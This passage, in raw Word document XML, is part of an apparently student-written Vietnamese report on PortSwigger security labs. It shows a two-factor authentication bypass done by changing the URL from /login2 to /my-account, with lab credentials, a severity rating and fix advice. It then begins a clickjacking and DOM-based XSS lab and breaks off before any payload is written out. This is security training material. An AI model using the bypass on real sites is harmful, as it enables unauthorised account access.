        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C378F7" w14:textId="4BB05E13" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t xml:space="preserve">Sau đó truy cập và trang email để lấy mã code, chính là: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0235</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B047D11" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00CA1C6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7726491B" wp14:editId="12CF9702">
            <wp:extent cx="6115050" cy="3281680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="706992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92605" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId239"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3281680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="463EA6C7" w14:textId="556D6321" w:rsidR="00F67FB2" w:rsidRPr="00F656A4" w:rsidRDefault="00F656A4" w:rsidP="00F656A4">
      <w:r w:rsidRPr="00F656A4">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:t>hập mã code này vào và chọn Login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C910392" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00CA1C6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40E0E77E" wp14:editId="0F1D965B">
            <wp:extent cx="6115050" cy="1615440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1983274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74299" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId240"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1615440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1242EBBB" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5A29CB" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00CA1C6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D1DE2C4" wp14:editId="7E9184DE">
            <wp:extent cx="6115050" cy="4329430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="363586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86896" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId241"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4329430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36461741" w14:textId="77777777" w:rsidR="00BB4C3E" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t xml:space="preserve">Đến đây, thấy url đang là: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1C6F">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0029766D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>my-account</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1C6F">
        <w:t>?id=wiener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0227D1" w14:textId="0C871BE7" w:rsidR="00F67FB2" w:rsidRPr="00F656A4" w:rsidRDefault="00F67FB2" w:rsidP="00F656A4">
      <w:r w:rsidRPr="00F656A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FA328AB" wp14:editId="215BF0E1">
            <wp:extent cx="6115050" cy="597535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1755664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64276" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId242"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="597535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE32F3" w14:textId="0313B240" w:rsidR="00F67FB2" w:rsidRPr="00F656A4" w:rsidRDefault="00F67FB2" w:rsidP="00F656A4">
      <w:r w:rsidRPr="00F656A4">
        <w:t>Tiếp the</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve">o thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t xml:space="preserve">đăng xuất khỏi tài khoản hiện tại và thử đăng nhập vào tài khoản khác, ví dụ như tài khoản </w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="00F656A4">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>carlos</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="00F656A4">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB56CB2" w14:textId="065D3B62" w:rsidR="00F67FB2" w:rsidRPr="0029766D" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00CA1C6F">
        <w:t xml:space="preserve"> Thử đăng nhập với tài khoản: </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>montoya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117A907" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="0029766D" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0029766D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F34A986" wp14:editId="025865F5">
            <wp:extent cx="6115050" cy="2756535"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="907384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84332" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId243"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2756535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC4C81" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="0029766D" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0029766D">
        <w:t>Sau khi đăng nhập, trang web yêu cầu xác thực hai yếu tố:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFDE56" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0029766D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="144C072D" wp14:editId="43BC1268">
            <wp:extent cx="5035809" cy="2768742"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="661493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93051" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId244"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5035809" cy="2768742"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56914B41" w14:textId="526E9C13" w:rsidR="00F67FB2" w:rsidRPr="00F656A4" w:rsidRDefault="00F656A4" w:rsidP="00F656A4">
      <w:r w:rsidRPr="00F656A4">
        <w:t xml:space="preserve">Đến đây, việc tiếp theo là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve">sẽ thực hiện thay đổi URL bằng cách thay </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/login2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve"> bằng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/my-account</w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve"> và tải lại trang. Kết quả là đã vượt qua được xác thực 2 yếu tố và hoàn thành thử thách của bài lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F00D76E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="002351AD" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0029766D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="211AEE15" wp14:editId="212C6E5A">
            <wp:extent cx="6115050" cy="3493135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1133004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04161" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId245"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3493135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E555021" w14:textId="6049C5C0" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="002351AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>High (Cao)</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve"> v</w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>ì vượt qua cơ chế xác thực hai yếu tố có thể cho phép kẻ tấn công truy cập vào tài khoản của người dùng mà không cần sự xác nhận hoặc quyền truy cập hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EFF288" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="002351AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>Cần thực hiện việc chặn truy cập vào các phần của trang web nếu người dùng chưa hoàn thành quá trình xác thực hai yếu tố. Đồng thời, cần kiểm tra và cập nhật các thiết lập bảo mật để đảm bảo rằng chỉ những người dùng đã xác thực hai yếu tố mới có thể truy cập vào các phần của trang web có yêu cầu xác thực này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FCBEF1" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc182429530"/>
      <w:bookmarkStart w:id="91" w:name="_Toc182909891"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t>10: Exploiting clickjacking vulnerability to trigger DOM-based XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="6F35E81C" w14:textId="03B653AE" w:rsidR="00F67FB2" w:rsidRDefault="00F656A4" w:rsidP="00F67FB2">
      <w:hyperlink r:id="rId246" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/clickjacking/lab-exploiting-to-trigger-dom-based-xss</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02165BBC" w14:textId="29DB3C71" w:rsidR="00F67FB2" w:rsidRPr="002351AD" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="00F656A4">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>ận dụng lỗ hổng XSS dựa trên DOM để tạo các truy cập vào các đường dẫn độc hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC9DB98" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="002351AD" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F96753" w14:textId="05144F4A" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> Truy cập vào bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFDD9DB" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00866826">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40923A8D" wp14:editId="44DD147B">
            <wp:extent cx="6115050" cy="2623820"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="2025073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73940" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId247"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2623820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B8650" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Sau khi truy cập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187CB083" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BE46BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="706783AE" wp14:editId="4E33919D">
            <wp:extent cx="6115050" cy="3686810"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1465404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04457" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId248"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3686810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C5867" w14:textId="3F7E4997" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BE46BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BE46BC">
        <w:t>hăm dò trang web và tìm thấy được chổ điền form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D280D7B" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00BE46BC" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BE46BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B6600FD" wp14:editId="0340B24B">
            <wp:extent cx="6115050" cy="4968240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1009441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41949" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId249"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4968240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="649A0C03" w14:textId="7E8A8A07" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BE46BC">
        <w:t>hực hiện điền thông tin vào form như yêu cầu và submit feedback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CBC841" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BE46BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6404AC8E" wp14:editId="225C9E1B">
            <wp:extent cx="5410955" cy="714475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1981261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61165" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId250"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5410955" cy="714475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE0E14" w14:textId="2CB2FB26" w:rsidR="00F67FB2" w:rsidRPr="00BE46BC" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BE46BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BE46BC">
        <w:t>iểm tra phần dưới form, thấy rằng các giá trị đầu vào không được lọc</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FECC0A" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00FB3F21">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="562A261C" wp14:editId="2A04D1C5">
            <wp:extent cx="6087325" cy="2562583"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="1160754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54292" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId251"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6087325" cy="2562583"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E66D01" w14:textId="65047F82" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00FB3F21">
        <w:t xml:space="preserve"> Tiếp theo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> việc cần làm là sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00FB3F21">
        <w:t>chèn một đoạn payload vào đó và kiểm tra kết quả</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F0A33E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="001E7D54" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="001E7D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F044FE" wp14:editId="3D937042">
            <wp:extent cx="6115050" cy="654050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="312434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34247" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId252"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="654050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="007FA80E" w14:textId="5BB490CB" w:rsidR="00F67FB2" w:rsidRPr="00FB3F21" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="001E7D54">
        <w:t xml:space="preserve">Trong đó, đoạn mã </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
